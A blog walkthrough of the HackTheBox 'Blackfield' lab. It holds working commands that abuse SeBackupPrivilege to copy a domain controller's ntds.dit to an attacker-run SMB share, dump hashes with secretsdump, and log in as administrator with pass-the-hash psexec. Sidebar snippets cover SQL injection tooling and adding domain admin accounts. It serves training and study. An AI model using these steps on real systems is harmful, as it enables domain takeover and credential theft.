Skip to main content

part 1 - creating smb server on linux or unix in order to data exfiltration from other server | ntfs disk | dd command | extracting ntds.dit

the scenario is written while performing hackthebox blackfield box. 

after getting access on a system, see what privileges you have by running command whoami /all or whoami /priv

if you see sebackupprivilege and serestoreprivilege then you can proceed the below all steps. these two are most dangerous privileges specially when you are in AD. 

creating a share on 10.10.10.14 (our system) so that we can pull out some data from an AD that we compromised.

creating a smb server on the following directory /home/ippsec/blackfield/


mkdir smb
cd smb
sudo smbserver.py -smb2support SendMeYourData $(pwd)


or


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd) 

The username and password is your own machine username and password.
SendMeYourData  is the share name.
once you give enter, it will start listening on 445

Now go to the AD where you get evil-winrm shell. scenario is you compromised the AD. now you want to exfiltrate c:\windows\ntds\ from AD to your own system.
you are connected with the AD using winrm shell. note: in win-rm shell we need to provide a hash of powerful user to get access on a system. and we provide svc_backup user hash. 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


or 


you can use this command as well if there is a authentication problem arise:


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData /user:ippsec PleaseSubscribe


PleaseSubscribe is the password. 

  
when you run above command then the task will fail because the backup process will tell you do you want to start the back operation? type yes or no. as you are on the winrm shell so you dont have any further shell to type yes. so run the below command.

 
*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


but actually the above command will also not start backing up the data successfully because it needs the target volume should be formatted with NTFS/ReFS

Main task starts from here:


So lets create a ntfs file system. Creating ntfs file system on our machine (10.10.10.14). this ntfs file system we will be mounting.
Now to proceed further go to your own machine again:
ippsec@parrot$
we are going to create 2GB ntfs disk.


dd if=/dev/zero of=ntfs.disk bs=1024M count=2


sudo losetup -fP ntfs.disk


-f for --find-----> find first unused device and -P for --partscan---> create a partitioned loop device 


losetup -a 


/dev/loop0: /home/ippsec/htb/blackfield/ntfs.disk


now it is mounted on /dev/loop0


now do the following:


sudo mkfs.ntfs /dev/loop0

 
now it should make /dev/loop0 to ntfs file system.

 
sudo mount /dev/loop0 smb/  (mounting /dev/loop0 with /home/ippsec/htb/blackfield/smb/ directory that we had created sometimes ago) 


mount | grep smb


/dev/loop0 on /home/ippsec/htb/blackfield/smb

now lets run the impacket script again.
from your own machine where you setup smb server: 


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd)

From AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\

unfortunately this is gonna also fail because impacket does not handle the smb well.

 

ok now lets do actual smb configuration: from your host machine:


mkdir /home/ippsec/htb/blackfield/smb/ 


chmod 777 /home/ippsec/htb/blackfield/smb/ (optional)

 
sudo vi /etc/smb/samba.conf   (see 232 lines)


Path =  /home/ippsec/htb/blackfield/smb/$   (on parrot os, every line in configuration file ends with $ sign)
read only = no$
guest ok = yes$
 

sudo systemctl restart smbd

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: /delete  (if there is previous share mounted) 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData


now we have x: mounted.  lets try the wbadmin command again. 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\
 

hopefully it will work now.

now go to your host machine:


ippsec@parrot$ cd /home/ippsec/htb/blackfield/smb/


watch -n 1 'ls -la'   


you probably see, WindowsImageBackup created. under that DC01 is created. under that .vhdx file is created. it will take some time to complete.

from the AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData  (mount the share to access from AD, already done this previously. before doing this please check again) 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> x: or cd x:\
dir


once the backup is done, then run below command to get the version:



*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin get versions

note down the version which is

10/02/2020 -03:51

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo Y | wbadmin start recovery -version:10/02/2020 -03:51 -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

recovering ntds.dit file will take some time because it will fetch that from the backup that you had created. once done follow below steps.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd \

dir

you should see ntds.dit file.   

now download the file:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit

ntds.dit will be saved on the directory of your own machine where you last stayed. say you stayed on /htb/blackfield/ directory on your own machine.

ntds.dit is your AD domain database and this DB is encrypted with a boot key. the boot key is located to hklm\system registry location.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.hive

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive (now also download the system.hive)

now go to your host/own machine to run secretsdump.py tool.

ippsec@parrot$

secretsdump.py -ntds ntds.dit -system system.hive LOCAL

secretsdump.py -ntds ntds.dit -system system.hive -history LOCAL

 

now you have the administrator hash. so from your host / own machine launch psexec.py

to access AD 10.10.10.192

ippsec@parrot$

psexec.py -hashes 184fb5e5178480be64824d4cd53b99ee:184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192

 you can do ntlm:ntlm or lm:ntlm

but lm hash portion is not used. psexec.py just want to see it.

now you should access C:\Windows\system32> whoami

nt authority\system

C:\Windows\system32> cd \Users\Administrator\Desktop

dir

type root.txt

see the part 2

Comments

Post a Comment

Popular posts from this blog

Install Nessus from docker

Docker installation. Give the below commands one by one. apt install docker-cli apt install docker.io After the installation is complete, if you are inside wsl then give this command to start docker, because inside wsl systemd (systemctl) does not work: service docker start WSL troubleshooting : If the above command " service docker start " does not work then use below command: dockerd (It may not work if any previous docker process is running. It will show you pid of that process. Use this command to kill that process " kill -9 pid " and run dockerd command again) If " docker ps -a " giving error like " Cannot connect to the Docker daemon at unix:///run/podman/podman.sock. Is the docker daemon running? " This is because you may installed podman-docker package. If you remove the package still you will get this error but you should remove the package. Then issue this command: env | grep -i docker DOCKER_HOST=unix:///run/podman/podman.sock   -->...
Post a Comment
Read more

Installtion of SQLMutant tool

This tool is perfectly works on ubuntu 24 system. And I found it is not working properly in kali linux 24 version.   https://github.com/blackhatethicalhacking/SQLMutant/tree/main This tool need to use along with sqlmap tool. Showing this cheat sheet for kali or debian based system.  This tool actually analyze everything and give you the vulnerable url where sql injection is possible. You just need to use then sqlmap to exploit that.   Prerequisite: apt install pipx -y (for ubuntu) pip3 install uro or pipx install uro pipx ensurepath pipx completions  (not needed)  source ~/.bashrc   or restart system If go tool is not installed then run the below two commands first ( golang-go ) or follow this link to install go (https://mahimfiroj.blogspot.com/2024/12/installing-nuclei-in-kali.html) otherwise skip this step.   dpkg -l | grep packagename (Using this command you can check package is installed or not) apt install gccgo-go -y or apt install gol...
Post a Comment
Read more

net command cheat sheet

  To see what users present in the system: net user To see local groups in the system: net localgroup To see domain groups. This should be run on a domain controller: net group To see the details of a user along with his/her group membership: net user mahim To see who are the members of a particular group (local machine): net localgroup "administrators"    (These are not case sensitive. You can use administrators or Administrators. Both will give you same result. To see who are the members of a particular group (domain machine): net group "domain admins" Create a local user: net user localuser1 MyP@ssw0rd /add Create a domain user: net user domainuser1 MyP@ssw0rd /add /domain Add the local user to local admin group: net localgroup Administrators localuser1 /add Add the user to domain admin group: net group "Domain Admins" domainuser1 /add /domain Avi
Post a Comment
Read more